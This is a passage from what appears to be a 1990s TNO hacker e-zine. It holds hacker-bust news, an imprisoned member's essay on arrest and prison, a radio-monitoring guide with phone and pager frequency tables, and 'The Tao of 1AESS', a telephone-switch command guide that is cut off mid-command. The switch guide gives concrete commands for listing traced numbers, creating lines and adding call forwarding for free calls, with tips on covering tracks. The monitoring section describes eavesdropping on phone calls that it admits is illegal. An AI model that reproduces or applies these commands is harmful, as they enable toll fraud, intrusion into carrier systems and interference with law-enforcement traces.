McCubbery, director for the center on electronic commerce at DU. McCubbery estimates that authorities learn of only 5% of computer crimes. He said computer security experts generally have difficulty keeping up with the hackers. [No shit] ----------------------------------------------- (Side note box) THE NEW ORDER (Bullet listing) Some accusations listed in court documents concerning The New Order group of computer hackers: - A hacker from the United Kingdom offered suspect John Jackson a VISA card number with a $300,000 credit limit. [Tacos anyone?] - A computer seized from a Highlands Ranch home contained password files for computer systems at the University of Colorado at Boulder. - A note found in Jackson's home indicated his plans to hack into the Thornton Police Department computer. [Yes, they believe everything they read] - Jackson also had a computer file containing access information for Taco Bell and McDonald's computers. [There goes national security!] =-= That is all for now. Not a good year by any means as you can tell, especially considering who else may have been busted, that we didn't hear about. Don't stop what you are doing though, just be more careful of your activities. YOU are right, THEY are wrong. ========= What Happens When You Get Caught -------------------------------- [A.K.A The Hackers Guide to the Law and Prisons] by D. Fanning - A.K.A. John Falcon/Renegade - TNO Well if you are reading this, that means you are either curious or shit happened and the law reared it's ugly head and they nabbed you. Now what you are about to read is absolutely fucking true. Why is this? Because I am spending the next year or so in prison for hacking. Now needless to say, I have already announced my retirement from the scene, but I still wanted to write and rant and rave about all the things that happen in this world and to clue you in on a quite a few things. Let's start with the ground rules: 1. You cannot make a deal with a cop. So when they start reading Miranda rights, keep silent or just ask inconspicuous questions like "Where are we going?", or the common ne, "What's going on here? Why am I being charged?" Only a D.A. or someone in the lawyer capacity can make a deal. If a cop offers a deal, you are still going to get charged. Cops cannot make any exceptions on anyone. So drop all ideas of such. 2. Do not narc on anyone when the questioning starts. Your best bet would be to just stay silent till the lawyer shows up or something. Why? Questioning wouldn't be done unless there were gaps in their investigation. What you want is as many of those as possible. The more you have, the better it will be when plea bargaining starts up. At the very least though, lets say the they do convict you, the feds and the court find you guilty or you plea that way and you are thrown into the clink. Guess who does your admissions paperwork? You guessed it, the inmates. Word has a way of coming around to dealing or giving a very wide berth to those who do the narc thing Key idea: "If you fall, don't bring others down too. It just adds to the load on you." 3. During questioning, they will put on a lot of plays to make you talk, they will offer you something to drink or something to make you feel more comfortable. Well why not? Spend 60 cents and get your work done for you by a confession. Makes things nice and neat. Don't fall for it. If you are thirsty, accept the drink and don't tell them shit. 4. They will also do some kind of powerplay on you. They try to make you think that they are doing you a favor, but in reality, you are digging a deeper hole for yourself. 5. The idea of you being innocent until proven guilty has gone the way of the do-do bird. When a jury sees you, the first thought that comes to mind is not if you are guilty or not, the question is HOW guilty you are. The way they see it, if you are not guilty, what are you doing in front of them in the first place? The O.J. Simpson trial is a perfect example. Also, look how many cop shows are around the box. That right there is a disgrace in my book. First they have you on film, second they pat each other on the back while you are in misery. Sick. Well on with the show. If they have already done an investigation on you and you don't hear from them in a while, the first natural reaction would be to relax and let your guard down. WRONG ANSWER! That means that some shit is really going to go down. You should be extra careful and not talk about it to anyone. Most likely they are looking for more evidence to make it harder on you in the long run, like a wiretap. In the federal system, all you need is one person's permission to record a phone call. If you have to talk about it, use face to face contact and pat each other down to make sure there is no bug. For instance, when I was arrested I made a fatal mistake and talked about it to one of the co-defendants and he had cut a deal with the D.A. already. My bacon was cooked when I heard my voice on a tape recording. Well no matter what happens, sooner or later you will get nabbed so I won't get into the details of this. All I can suggest is that you really do what ever you can to get a real attorney. P.D.'s are good for some things but they get their paycheck from the same place that nabbed you in the first place so don't let that fool you too much. I will admit that it is better than nothing though. Most likely for the computer hackers out there, they will charge you under 18-USC-1029 which is Fraudulent or Counterfeit use of an Access Device. This charge was mainly intended for credit cards but the D.A.'s have taken it to just about everything that involves computers or communications in general. Now there are some landmark cases that have beat this into the ground. One of them being U.S. vs Brady which was a guy making satellite decoders with the stops pulled out of them. He beat this due to the ruling that the signal was out there everywhere and that he merely just decoded the signal. Therefore there was no actual loss, just potential loss which doesn't count. Another one is U.S. vs McNutt in the 10th Circuit of Utah. This guy made chips for cellular phones that would send different ESN/MIN pairs to the cell site that made it always seem like a new roamer every time he calls. The cell site just goes ahead and gives him the call because it doesn't have time to verify if it is a valid MIN/ESN pair. He won the case due to the same fact that there were no accountable loss because it never used or really billed any legit customer. The flip side of that is being two weeks ago from when this was written, a guy was tried in LA for the exact same thing and was found guilty, appealed the case, won the appeal, then the government re-appealed it and he lost again. This caused a split in the court circuits which means that this will got the Supreme Court. Remember that the government or any government agency will not press any issue unless there is some kind of financial deal behind it because they are wasting time and resources on you when they can be getting Joe Blow Cartel Drug Dealer. So they find you guilty or you plea. The next step is the Pre-Sentence Investigation. They basically take a fine tooth comb and find any dirt about you that they can. You will be amazed about all the things they can do to make you seem like a threat to society, the American way of life, apple pie and all... All you can do is make sure or try your hardest to make it clean as possible. Now I got ripped hard on mine due to very strained relations with one of my parents and they managed to throw everything that anyone had ever said about me together to make it look like I was truly evil. That is where the cops will come back and haunt you because everything you say will be in that report. Every little action and all will be written with a slant of a cop. (Needless to say who writes the report kids... The U.S. Probation Office, a branch of the Secret Service and the F.B.I.) Well you are convicted and here you are. Depending on where you live, you will either be bussed/vanned to the prison where they choose for you or they will fly you there. After you are sentenced you now belong to the Bureau of Prisons (A D.O.J. branch). Basically you will be taken to a county jail for holding while they classify you and then you get transported out. When I was transported out, I was in shackles and all taking a ride on Fed Air. The USM's have a fleet of 737's they confiscated from drug busts and converted them into their own use. You are basically bussed out to a unused or empty part of the airport and with a large ring of USM's with shotguns in their hand, you get put onto an airplane and given a box lunch and off you go. I went from Portland to Sacramento to Phoenix in one day. Spent the night at the FCI in Phoenix then the next morning from there to Lompoc where I am now. Remember these words though... You are now property of the B.O.P. Basically you are luggage, they can transport you at any time whenever they want to. But, depending on where you go, it isn't all that bad. Most likely you will meet friends or acquaintances that will help you along. Just ask a few questions and usually they will know. One thing to never do is be secretive about why you are there. You are there, most likely someone else is there for the same thing and you can get a strong fellowship going with people in the same predicament. One thing to always keep in mind from now to eternity, no matter where you go. The feds are nailing everyone for 'Conspiracy'. It's a damn shame when you go to a place where 90 percent of the inmate population is here on some kind of drug related charge and of that 90%, 35% are here on conspiracy related charges. Truly something to think about. Now for the hackers and phreakers that are facing jail. If your PSI report even breaths any mention of some kind of use with the computer, you will be banned from that. 3 days ago I was given a list of direct orders to avoid all contact of that. Likewise, they put a restriction on the levels of computer related material that I can read. Usually you can get any periodical you want except for things that deal with gay man on man stuff. Just like the gay people feel, that smells of discrimination but that's just the way it is. Phones are something else that you will wish that changes real quick. The phones are run by a B.O.P. thing called ITS-Inmate Telephone Services. Basically it's a Unix run PBX that limits the people you can call and it throws the bill on you. No more collect calls or anything of that nature. Just doesn't happen. But the inmates have won a Class action suit against the B.O.P. about this and the government right now is appealing it. Technically with a suit or even an appeal, you have to implement it as soon as you can after the judgement is made. But it's been a year since they won it and nothing changes. Basically it's the government stalling. Well that's all for me to say this time around. Remember to keep the dream alive and judge for yourself with that piece of gray matter between your ears. You can write any comments to me at: Fanning Reg No. 12617-006 3600 Guard Road Lompoc, CA 93436 or e-mail at ice@alaska.net or jfalcon@ice-bbs.alaska.net (I prefer the first method to save my friends postage costs.) Keep it strong - TNO (The New Order) John Falcon - Ex-TNo 1981-1994 ========= --- Legal and Technical Aspects of RF Monitoring --- --- Major [TNo] --- SYNOPSIS -------- The "Cordless Fun" (Noam Chomski, 2600 Magazine Summer 1994) article doubtlessly sparked an interest in cordless phone monitoring. Wireless telephones are a prime target for monitoring. Both cordless and cellular telephones are nothing more than radio transceivers that, at some point, interface with the telephone system. This article will seek to expand on and clarify some points made in "Cordless Fun", and also to point to some other areas of interest. ============================================================================= CORDLESS -------- Legal Stuff: Monitoring cordless phones is now a federal crime! Recent legislation prohibits listening in on cordless phones, much the same as cellular phones. Also, the Communications Act of 1934 makes it a crime to divulge anything you monitor to another person. It is also illegal to use anything that you hear for personal gain. Note that this applies to anything that you monitor, not just cordless phones. Alternatively, there are presently no restrictions on scanners that are capable of receiving cordless phone frequencies. However, I suspect that in the near future the feds will deny certification to such scanners, as they did with scanners that could receive cellular frequencies. Technical Stuff: Cordless telephones transmit and receive with very low power. This is primarily to minimize interference with other nearby cordless telephones. This makes scanning for cordless telephones a short-range endeavor. Most cordless phones of recent manufacture operate in the 46-49MHz range. However, the FCC has recently opened up a part of the 900MHz spectrum for cordless telephone usage. The new 900MHz phones often offer greater range and increased clarity. There are also models sporting "spread-spectrum" technology, which makes monitoring with conventional scanning-receivers a virtual impossibility. Another security measure on some cordless phones involves encoding the DTMF tones sent from the handset to the base. This prevents the base from accepting tones from other, unauthorized, handsets. It does not hinder monitoring the calls, but the DTMF tones will not be recognizable. In the 46-49MHz phones, there are ten frequency pairs available. Many older phones only utilize one pair. Newer, more expensive, phones can utilize all ten pairs. Some automatically search for an open channel, while others can be manually manipulated to find a channel with less noise. Likewise, the new 900MHz phones will scan to find a clear channel. CELLULAR -------- Legal Stuff: Intercepting cellular mobile telephone (CMT) traffic is illegal. The Electronic Communications Privacy Act of 1986 made it so. Scanners that receive the CMT portion of the 800MHz range may no longer be manufactured, sold, or imported into the U.S. Many scanners were designed to scan this area, though. When the Cellular Telephone Industry Association began complaining about this fact, most scanner manufacturers/resalers voluntarily "blocked" the cellular freqs from their scanners. This pacified the CTIA for a while, but the "blocks" were easily hackable. Typically, restoring a "blocked" scanner involved removing a single diode, a ten minute job for even the most devout technophobe. This fact led to the passage of the Telephone Disclosure and Dispute Resolution Act (TDDRA), which denies F.C.C. certification of scanners that receive cellular freqs, or those which may be easily modified to do so. New scanners will be "blocked" at the CPU, and hacking them is unlikely. Frequency converters offered another means of monitoring cellular and other 800MHz traffic. Essentially, a converter receives an 800MHz signal, and converts it to a 400MHz signal that the scanner is capable of receiving. Converters are useful for scanners that have no 800MHz reception capabilities, as well as those that have portions of the 800MHz band blocked. Unfortunately, converters were also outlawed by the TDDRA. They are still legal in kit-form, however. Another option would be to build one from scratch, which isn't an especially difficult project. Technical Stuff: The word "cellular" defines the cellular phone system. A service area is broken up into many small cells. As a user travels through an area, his call will be handed off from one cell to the next. This handoff is transparent to the user, but a monitor will lose the conversation. Cellular phones use low power (a maximum of five watts) so that a cell phone will not attempt to seize more than one site at a time. When a call is initiated by a cell phone, the nearest site will respond, and assign an available frequency to the phone. When the user moves comes into range of the next site, the process repeats itself, and the new site will assign a new frequency. Therefore, it can be difficult to track a particular conversation as it moves from site to site with a single scanner. Every area served by cellular phones will have two service providers. One will be the local RBOC, while the other will be a cellular-only provider. The two systems are designated as "A" and "B" systems, or "Wireline" and "Non-Wireline". There is no difference between the two for monitoring purposes, but since "A" and "B" carriers use different frequencies, it should be possible to identify local cell-towers as being "A" or "B" sites. PHONE PATCH ----------- Legal Stuff: The Communications Act of 1934 applies here as well, but there are no other prohibitions on monitoring business-band phone patches. Technical Stuff: Many business radio systems have the ability to tie into the phone system. Most of these systems will be found in 800MHz trunked radio systems. In a conventional radio system, one frequency will equal one channel. In a trunked system, however, frequencies and channels are independent of each other. The trunking computer will assign a different frequency to a radio each time it transmits, and it will send a signal to other radios on the same channel, telling them the current frequency in use. Phone patches are easy to monitor, though. Since the radio on a phone patch is transmitting constantly, the frequency used will remain the same for the duration of the conversation. Many people mistakenly believe these calls to be cellular, but they are not. Most phone patches found in 800MHz trunked systems will be full-duplex, just like cellular and home phones. Some systems, especially in UHF (around 450MHz) and 800MHz conventional radio systems will only be half-duplex, though. In those systems, only one person call talk at a time, just like normal two-way radios. Radio systems are typically designed to offer service to an entire metropolitan area, so range is quite good. The mobile radio will transmit its signal to a strategically located "repeater", which then re-broadcasts the signal with much more power. So long as a scanner is within reception range of the repeater output, monitoring will be possible regardless of the location of the party transmitting. EQUIPMENT ---------- Legal Stuff: Some states prohibit mobile use of scanners. Also, it is illegal to use a scanner in the commission of a crime. Technical Stuff: There is a scanner for every appetite. What sort of monitoring one wants to do will dictate which scanner one buys. For someone interested only in cordless phones, a ten-channel scanner with no 800MHz coverage will be quite adequate, and much cheaper than a more capable scanner. For someone interested in cellular, a full- coverage 800MHz scanner with a much greater frequency storage capacity will be necessary. Base, mobile or handheld? Depends entirely on how it will be used. Modern scanners are programmable, while older units require crystals. For someone wanting to monitor only a few channels (such as cordless phones, or the local police), a crystal-controlled scanner would be adequate, and much cheaper. But for more serious and varied scanning, programmable units are a necessity. Models are available that store between 10 and 1000 channels. Uniden/Bearcat and Realistic are the two most commonly available brands in the U.S. (although Realistic isn't actually a brand, just a label...Radio Shack scanners are all manufactured by Uniden or GRE, depending on the model). Because of the TDDRA, many of the best scanners from the past several years are no longer available, but watch for Hamfests (great electronic flea- markets...inquire at your local ham radio/electronics store), garage sales, etc. There is nothing in the TDDRA or other current legislation that prevents private parties from owning or selling pre-TDDRA equipment. Aside from the scanner itself, the next-most important piece of equipment is the antenna. Handheld scanners will generally utilize an "all-band" rubber-duck antenna (a flexible, rubberized antenna, between 8-14" in length), while base units will have a telescoping metal whip antenna. These antennas are adequate for receiving strong, local signals, but more discriminating monitors will demand more. For base units, an all band discone type antenna, mounted outside as high as practical, will offer good, omnidirectional performance. For those who only want to monitor a particular band, it would be best to use an antenna cut specifically for that band. Likewise, for those monitoring signals coming from one general direction, a directional antenna will offer better performance than an omnidirectional unit. For mobile use, using an antenna mounted on the vehicle will greatly improve reception. MISCELLANEOUS COMMUNICATIONS ---------------------------- Voice-pagers can offer interesting monitoring. While the data- transmissions that send the signal to the proper pager are proprietary digital signals (and as such, illegal to monitor or decipher), the actual "voice messages" are transmitted "in the clear". Packet-radio is used by ham radio operators. They have a vast network of computer bbs's that operate independently of the phone system. Modulated data is sent over the airwaves with a ham transceiver, where it is received and de-modulated with a Terminal Node Controller (TNC). Expect the use of wireless data transmissions to increase over the next few years, and not just among ham operators. While not having anything to do with telephones, the "baby monitors" people use are transmitters just like cordless phones. They are also low-power devices, so range is limited. Most people who use these devices would be shocked to learn that they are "bugging" their own home. PRESENT AND FUTURE CHALLENGES ----------------------------- Spread spectrum, digital transmissions, encryption...these are all factors that are affecting monitoring today. While most cellular systems are presently analog systems, there are operational digital systems in some areas. Scanners that are currently available won't be able to decipher the digital communications, and it is unlikely that digital-capable scanners will be produced. That means it will be up to the hackers to provide the technology to intercept these communications. Spread spectrum is quite hackable, as it was never intended as an encryption system, per se, yet the phone manufacturers are certainly marketing it as such. And one oft overlooked advantage of the Clipper chip is the fact that the backdoor can be exploited by hackers as well as the government. In the meanwhile, there are plenty of intercepts to be had, and there will continue to be. ================================================================= For More Information: ================================================================= Scanner Modification Handbook (Vols. I & II), by Bill Cheek The scanner modification handbooks offer a plethora of information on hacking scanners. Hacks include: increased channel capacity (example: RS PRO-2006 from 400 channels to 6,400!), adding signal- strength meters, cellular-freq. restoration, scanning-speed increases, and much more. World Scanner Report, by Bill Cheek A monthly newsletter on the latest scanner hacks. Available from: COMMtronics Engineering Box 262478 San Diego, CA 82196-2478 BBS: (619) 578-9247 (5:30PM to 1:30PM P.S.T. ONLY!) COMMtronics Engineering also offers a scanner-computer interface for RS PRO-43/2004/2005/2006 model scanners. =================================================================== CRB Research Books Box 56 Commack, MY 11725 CRB has books on scanner modifications, frequency guides, and other interesting subjects. ================================================================= POPULAR COMMUNICATIONS CQ Publications 76 N. Broadway Hicksville, NY 11801 (516) 681-2926 Pop Comm is a monthly magazine on all sorts of radio monitoring, including scanning, shortwave, and broadcast. ================================================================== MONITORING TIMES Grove Enterprises, Inc. P.O. Box 98, 300 S. Highway 64 West Brasstown, North Carolina 28902-0098 M.T. is a monthly magazine covering all varieties of radio communications. ================================================================== NUTS & VOLTS Nuts & Volts is a monthly magazine that covers a wide variety of electronic-related subjects. T&L Publications, Inc. 430 Princeland Court Corona, CA 91719 (909) 371-8497 (909) 371-3052 fax CI$ 74262,3664 1-800-783-4624 SUBSCRIPTION ORDERS ONLY =================================================================== USENET: alt.radio.scanner rec.radio.scanner =================================================================== Charts & Tables: 1. Cordless Telephone Frequencies (VHF) 2. Cordless Telephone Frequencies (900MHz) 3. Cellular Telephone Frequencies 4. Business Band Frequencies (VHF, UHF, 800MHz) 5. IMTS Frequencies 6. PAGER Frequencies 7. PACKET Frequencies 8. ROOM MONITOR Frequencies 9. homebrew cordless dipole antenna 10. homebrew 1/4 wave groundplane antenna ================================================================= TABLE 1 - CORDLESS TELEPHONE FREQS. (CONVENTIONAL) CH BASE HANDSET -- ---- ------- 1 46.100 49.670 2 46.630 49.845 3 46.670 49.860 4 46.710 49.770 5 46.730 49.875 6 46.770 49.830 7 46.830 49.890 8 46.870 49.930 9 46.930 49.990 10 46.970 46.970 ================================================================= TABLE 2 - 900MHz CORDLESS FREQS. Cordless phones have been allocated the frequencies between 902-228MHz, with channel spacing between 30-100KHz. Following are some examples of the frequencies used by phones currently on the market. ---------------------------------------------------------------- Panasonic KX-T9000 (60 Channels) base 902.100 - 903.870 Base frequencies (30Khz spacing) handset 926.100 - 927.870 Handset frequencies CH BASE HANDSET CH BASE HANDSET CH BASE HANDSET -- ------- ------- -- ------- ------- -- ------- ------- 01 902.100 926.100 11 902.400 926.400 21 902.700 926.700 02 902.130 926.130 12 902.430 926.430 22 902.730 926.730 03 902.160 926.160 13 902.460 926.460 23 902.760 926.760 04 902.190 926.190 14 902.490 926.490 24 902.790 926.790 05 902.220 926.220 15 902.520 926.520 25 902.820 926.820 06 902.250 926.250 16 902.550 926.550 26 902.850 926.850 07 902.280 926.280 17 902.580 926.580 27 902.880 926.880 08 902.310 926.310 18 902.610 926.610 28 902.910 926.910 09 902.340 926.340 19 902.640 926.640 29 902.940 926.940 10 902.370 926.370 20 902.670 926.670 30 902.970 926.970 31 903.000 927.000 41 903.300 927.300 51 903.600 927.600 32 903.030 927.030 42 903.330 927.330 52 903.630 927.630 33 903.060 927.060 43 903.360 927.360 53 903.660 927.660 34 903.090 927.090 44 903.390 927.390 54 903.690 927.690 35 903.120 927.120 45 903.420 927.420 55 903.720 927.720 36 903.150 927.150 46 903.450 927.450 56 903.750 927.750 37 903.180 927.180 47 903.480 927.480 57 903.780 927.780 38 903.210 927.210 48 903.510 927.510 58 903.810 927.810 39 903.240 927.240 49 903.540 927.540 59 903.840 927.840 40 903.270 927.270 50 903.570 927.570 60 903.870 927.870 ------------------------------------------------------------ V-TECH TROPEZ DX900 (20 CHANNELS) 905.6 - 907.5 TRANSPONDER (BASE) FREQUENCIES (100 KHZ SPACING) 925.5 - 927.4 HANDSET FREQUENCIES CH BASE HANDSET CH BASE HANDSET CH BASE HANDSET -- ------- ------- -- ------- ------- -- ------- ------- 01 905.600 925.500 08 906.300 926.200 15 907.000 926.900 02 905.700 925.600 09 906.400 926.300 16 907.100 927.000 03 905.800 925.700 10 906.500 926.400 17 907.200 927.100 04 905.900 925.800 11 906.600 926.500 18 907.300 927.200 05 906.000 925.900 12 906.700 926.600 19 907.400 927.300 06 906.100 926.000 13 906.800 926.700 20 907.500 927.400 07 906.200 926.100 14 906.900 926.800 ------------------------------------------------------------ OTHER 900 MHZ CORDLESS PHONES AT&T #9120 - - - - - 902.0 - 905.0 & 925.0 - 928.0 MHZ OTRON CORP. #CP-1000 902.1 - 903.9 & 926.1 - 927.9 MHZ SAMSUNG #SP-R912- - - 903.0 & 927.0 MHZ ------------------------------------------------------------ ================================================================== TABLE 3 - CELLULAR TELEPHONE FREQUENCIES wireline ("b" side carrier) 824.1000-834.9000 869.0100-879.9900 non-wireline ("a" side carrier) 835.0200-849.0000 880.0200-894.0000 ================================================================== TABLE 4 - BUSINESS BAND RADIO FREQS. 151.5050-151.9550MHz 154.4900-154.5400 460.6500-462.1750 462.7500-465.0000 471.8125-471.3375 474.8125-475.3375 896.0125-900.9875 935.0125-939.9875 806.0125-810.9875 811.0125-815.9875 816.0125-820.9875 851.0125-855.9875 856.0125-860.9875 861.0125-865.9875 ================================================================= TABLE 5 - MOBILE TELEPHONE FREQS. (see note1 below) SIMPLEX OUTPUT INPUT OUTPUT INPUT -------- -------- -------- -------- -------- 035.2600 152.0300 158.4900 454.3750 459.3750 035.3000 152.0600 158.5200 454.4000 459.4000 035.3400 152.0900 158.5500 454.4250 459.4250 035.3800 152.1200 158.5800 454.4500 459.4500 035.5000 152.1500 158.6100 454.4750 459.4750 035.5400 152.1800 158.6400 454.5000 459.5000 035.6200 152.2100 158.6700 454.5250 459.5250 035.6600* 454.0250 459.0250 454.5500 459.5500 043.2200* 454.0500 459.0500 454.5750 459.5750 043.2600 454.0750 459.0750 454.6000 459.6000 043.3400 454.1000 459.1000 454.6250 459.6250 043.3800 454.1250 459.1250 454.6500 459.6500 043.4200 454.1500 459.1500 043.3000 454.1750 459.1750 043.5000 454.2000 459.2000 043.5400 454.2250 459.2250 043.5800* 454.2500 459.2500 043.6400* 454.2750 459.2750 152.2400* 454.3000 459.3000 152.8400* 454.3250 459.3250 158.1000* 454.3500 459.3500 158.7000* *-also allocated for pager usage (note1: These freqs are, for the most part, dead. The FCC has reallocated most of these for other services.) ================================================================= TABLE 6 - PAGER FREQUENCIES 035.2200 035.5800 152.4800 154.6250 158.4600 157.7400 465.0000 462.8000 462.7750 462.9250 462.7500 462.8750 462.8250 462.9000 462.8500 928.0000 929.0000 930.0000 931.0000 ================================================================= TABLE 7 - PACKET FREQUENCIES 050.6200 223.5200-223.6400 223.7100-223.8500 2303.500-2303.800 2303.900 2399.000-2399.500 ================================================================= TABLE 8 - BABY MONITOR FREQUENCIES 49.300 49.830 49.845 49.890 ================================================================= TABLE 9 - AIR PHONE FREQUENCIES OUTPUT INPUT 454.6750 459.6750 454.9750 459.9750 849.0000 851.0000 894.0000 896.0000 ================================================================== CHART 10 - IMPROVED ANTENNA FOR CORDLESS MONITORING The best way to improve the range for monitoring cordless telephones is to use an antenna specifically cut for the frequencies used in cordless phones. The following is a very effective, yet easy to build, "homebrew" antenna. CORDLESS DIPOLE --------------- materials needed: wire - virtually any type will suffice matching transformer (RS part number 15-1296) f connector (RS part number 278-225) ??? connector (this will connect the antenna to the scanner, so it will be dependant upon what type of antenna jack the scanner utilizes. Most use a BNC-type connector. Some older models will use a Motorola-type connector.) coax cable - while many types of coax can be used, a low-loss cable would be best, especially if a long cable run is required. RG-6 satellite coax (RS part number 278-1316) is a good choice. wire transformer wire -------------------------< >------------------------- + f connector | | coax | | * connector [ ] scanner ================================================================= CHART 11 - 1/4 WAVE GROUND PLANE ANTENNA Here is a simple-to-build antenna that will improve reception for a particular frequency area. materials needed: wire - a rigid wire is needed here. Clothes hangers work well. panel mount SO-239 connector (RS part number 278-201) male PL-259 connector (RS part number 278-205) coax cable connector (to scanner) | | | | [ ] / \ / \ / \ The length of the five rods will be dependant upon the frequency you intend to monitor. Use the following formula: WL=3X10^8/F WL = wavelegnth (in meters) F = frequency (in MHz) ========= -=- -= The Tao of 1AESS =- -=-=-=-=-=-=-=-= -= DeadKat&Disorder =- -=- -= Special thanks to Gatsby and Mark Tabas =- Introduction -=-=-=-=-=-= The Bell System's first trial of electronic switching took place in Morris, Illinois, in 1960. The Morris trial culminated a 6-year development and proved the viability of the stored-program control concept. The first application of electronic local switching in the Bell System occurred in May 1965 with the cutover of the first 1ESS switch in Succasunna, New Jersey. The 1ESS switching system was designed for use in areas where large numbers of lines and lines with heavy traffic (primarily business customers) are served. The system has generally been used in areas serving between 10,000 and 65,000 lines and has been the primary replacement system for urban step-by-step and panel systems. The ease and flexibility of adding new services made 1ESS switching equipment a natural replacement vehicle in city applications where the demand for new, sophisticated business and residence services is high. In 1976, the first electronic toll switching system to operate a digital time-division switching network under stored-program control, the 4ESS system, was placed in service. It used a new control, the 1A processor, for the first time to gain a call carrying capacity in excess of 550,000 busy-hour calls. The 1A processor was also designed for local switching application. It doubled the call-carrying capacity of the 1ESS switching system and was introduced in 1976 in the first 1AESS switch. The network capacity of 1ESS switching equipment was also doubled to allow the 1AESS switch to serve 130,000 lines. In addition to local telephone service, the 1AESS switches offer a variety of special services. Custom Local Area Switching Services (CLASS) are available as well Custom Calling Services. Business customers may select offerings such as centrex, ESS-ACS, Enhanced Private Switched Communications Service, or electronic tandem switching. Although more modern switches like 5ESS and DMS 200 have been developed, it is estimated that some 50 percent of all switches are still 1AESS. Commands -=-=-=-= The 1AESS uses a command line interface for all commands. The commands are divided into three fields: action, identification, and data. The fields are always separted by a colon. Every command is terminated by either a period for verification commands or a 'ballbat' (!) for change commands. The control-d is used to execute the command instead of a return. The underscore is used as a backspace. Commands are always typed in 'all caps'. The action field is the first field of the command and is ended by a colon. The identification field is ended by the second colon. The identification field has one or two subfields which are separated by a semicolon. Semicolons are not used elsewhere in the command. The data field consists of keyword units and is the remaining portion of the command. Basic Machine Commands -=-=-=-=-=-=-=-=-=-=-= These commands provide useful information from the system. The WHO-RV- command will tell you what CO it is and what version of the OS is installed. If your output is scrolling off the screen press space to end scrolling. The V-STOP- command will clear the buffer. WHO-RV-. System information. SPACE Stops output from scrolling. V-STOP-. Free buffer of remaining LENS/INFO. Channel Commands -=-=-=-=-=-=-=-= Channel commands are used to redirect input and output. If a switch won't respond to a command use the OP:CHAN command to check on current channel. If your channel is not responding, use the MON:CHAN command to switch output and control to your terminal (the remote). You can check the status of the RC with the RCCENSUS command. OP:CHAN:MON! Shows all channels which are being monitored. MON:CHAN SC1;CHAN LOC! Redirect output to remote screen. STOP: MON;CHAN SC1;CHAN LOC! Redirect output to local screen. (This command needs to be done after you are finished to help cover your tracks) OP:RCCENSUS! To see recent change status. Tracing Commands -=-=-=-=-=-=-=-= CI-LIST- will give you a list of all numbers which are being traced externally. It will not show you lines which are being traced internally, ie: numbers inside one of the prefixes controlled by the switch you are on. CI-LIST-. Traced line list. Check Features on Line -=-=-=-=-=-=-=-=-=-=-= The VF command is used to check the current settings on a line. The DN XXXXXXX specifies the phone number of the line you wish to check. Replace XXXXXXX with the seven digit phone number of the line you are checking. VF:DNSVY:FEATRS,DN XXXXXXX,1,PIC! Check features of a line. VF:DNSVY:DN XXXXXXX,1,LASFTRS! Display last Features Call Features CWT- Call Waiting CFB- Call Forward Busy - Busy=VM CFV- Call Forwarding Variable CFD- Call Forward Don't answer TWC- Three Way Calling TTC- Touch Tone RCY- Ring Cycle SC1- Speed Calling 1 SC2- Speed Calling 2 UNA- No Long Distance PXX- Block all LD service (guess) MWI- Message Waiting Indicator CHD- centrex(unremarkable) CPU- centrex(unremarkable) CLI- Calling Line Identification (CID) ACB- Automatic Call Back Feature (?) BLN- Special Toll Billing FRE- Free Calling The standard output of a command appears below. The 'DN 348 2141' specifies the number you are checking. The calling features will be listed on the second line by their three letter acronyms. This line has call waiting (CWT), a trace (TRC), and touch tone dialing (TTC). Example of 1A output: M 53 TR75 2 DN 348 2141 00000003 CWT TRC TTC Searching For Free Lines -=-=-=-=-=-=-=-=-=-=-=-= The VFY command can be used to check if a line is in use. The output will list the LEN (Line Equipment Number) for the line and its call features in octal. If the LEN is all zeros, then that number has not been assigned. Replace XXXXXXX with the number you wish to check. You must prefix the phone number with 30. You can also check for unused LEN's using the VFY command. Use the space bar to stop scrolling and the V-STOP command to cancel when looking up free LEN's. VFY-DN-30XXXXXXX. Search for free lines. VFY-LEN-4100000000. List all free LENs. VFY-TNN-XXXXXXXX. To get information on trunk. The output for the VFY-DN command will appear like the one below. Notice that this number has been assigned a LEN so it is in use. M 06 TR01 796 9146 0 0 0 0 LEN 01 025 000 001 000 000 000 000 000 4 000 000 000 000 000 000 000 000 0 0 0 0 0 0 0 0 0 Searching for a Particular Feature on a Line (like trace) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= All line information is stored in the switch for its coverage area. The switch is like a huge database in this sense. You can do global searches on the switch for any feature. One especially interesting feature to search for are traced numbers. Traced numbers listed this way are INTERNALLY traced as opposed to globally traced numbers shown with the CI-LIST- command. Global and internal trace lists are always very different. And remember, be a good samaritan and call the person being traced and let them know! ;-) VF:DNSVY:FEATRS,EXMATCH TRACE! Pull all numbers IN switch area with trace on it (takes a sec). You can exmatch for any LASS feature by replacing the keyword TRACE with any call feature like call forwarding (CFB) and speed calling (SC1). To See What Numbers Are on a Speed Calling List -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Another nice use for the VFY command is to see what is on a line's speed calling list. Replace XXXXXXX with the target phone number. One devious use is to look at the CO's speed call list to find other internal telco numbers. VFY-LIST-09XXXXXXX020000 09=mask 02=single list (one digit speed calling) 20=double list (two digit speed calling) 28= " " 36= " " 44= " " To Build a Line -=-=-=-=-=-=-=- The recent change command (RC) is used to create and modify lines. Because RC commands are usually very long and complex, they are typed on multiple lines to simplify them. Each subfield of the data section of the command is typed on a separate line ended by a slash (\) followed by pressing ctrl-d. To create a line, you specify LINE in the identification field. Before a line can be created, you must first locate an unused number by using the VFY-DN command explained above. Once a free number has been found, you use the VFY-LEN to find an available LEN. To build a new line, follow these steps: First, find spare LEN (VFY-LEN-4100000000.). Next find free line. Now type in the RC commands using the following commands as a template: RC:LINE:\ (create a line) ORD 1\ (execute the command immediately) TN XXXXXXX\ (telephone number) LEN XXXXXXXX\ (len found from above) LCC 1FR\ (line class code 1fr) CFV\ (call forward) XXX 288\ (type XXX, space, then the three digit PIC) ld carrier - 222 - MCI 288 - AT&T 333 - Sprint, etc.) ! (BEWM, don't forget the ctrl-d!!) (Look for RCXX blah blah ACPT blah - This means the RECENT CHANGE has taken affect) Creating Call Forwarding Numbers -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= The call forwarding feature is the most important feature for hackers. By creating a line or modifying an existing line with call forwarding, you can than use it to make free phone calls. You set the line to call forward/ no ring and then give it the call forwarded number. This will allow you to call the modified line and be instantly forwarded to your pre-chosen destination. First create a line using RC:LINE:, then modify the line using the following commands as a template. RC:CFV:\ (add call forwarding to a line.. begin: ) ORD 1\ (execute the command immediately) BASE XXXXXXX\ (base number you are changing) TO XXXXXXX\ (local - XXXXXXX : ld - 